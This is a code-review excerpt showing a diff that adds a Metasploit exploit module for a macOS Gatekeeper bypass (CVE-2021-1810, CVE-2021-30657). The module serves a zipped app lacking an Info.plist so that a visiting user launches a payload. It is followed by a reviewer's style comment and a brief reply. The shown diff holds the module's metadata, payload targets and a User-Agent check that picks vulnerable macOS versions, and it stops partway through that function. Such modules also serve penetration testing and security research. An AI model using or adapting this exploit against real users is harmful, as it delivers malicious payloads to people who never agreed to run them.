modules/exploits/osx/browser/osx_gatekeeper_bypass.rb

```diff
@@ -0,0 +1,106 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'macOS Gatekeeper check bypass',
+        'Description' => %q{
+          This module serves an OSX app (as a zip) that contains no Info.plist, which
+          bypasses gatekeeper in macOS < 11.3.
+          If the user visits the site on Safari, the zip file is automatically extracted,
+          and clicking on the downloaded file will automatically launch the payload.
+          If the user visits the site in another browser, the user must click once to unzip
+          the app, and click again in order to execute the payload.
+        },
+        'License' => MSF_LICENSE,
+        'Targets' => [
+          [ 'macOS x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
+          [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+          [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2021-03-25',
+        'Author' => [ 'Cedric Owens' ],
+        'Notes' =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'References' => [
+          ['CVE', '2021-1810'],
+          ['CVE', '2021-30657'],
+          ['URL', 'https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508'],
+          ['URL', 'https://objective-see.com/blog/blog_0x64.html'],
+        ]
+      )
+    )
+    register_options([
+      OptString.new('APP_NAME', [false, 'The application name (Default: app)', 'app'])
+    ])
+  end
+
+  def check_useragent(user_agent)
+    if user_agent =~ /Intel Mac OS X (.*?)\)/
+      osx_version = Regexp.last_match(1).gsub('_', '.')
+      mac_osx_version = Rex::Version.new(osx_version)
+      if mac_osx_version >= Rex::Version.new('11.3')
+        print_warning "macOS version #{mac_osx_version} is not vulnerable"
+      elsif mac_osx_version < Rex::Version.new('10.15.5')
+        print_warning "macOS version #{mac_osx_version} is not vulnerable"
+      else
+        print_good "macOS version #{mac_osx_version} is vulnerable"
+        return true
+      end
+    else
+      print_warning 'Unexpected User-Agent'
+    end
+    return false
```

Comment:
Can this be refactored?

https://github.com/rubocop/ruby-style-guide#nested-conditionals

Reply:
Good idea, thanks!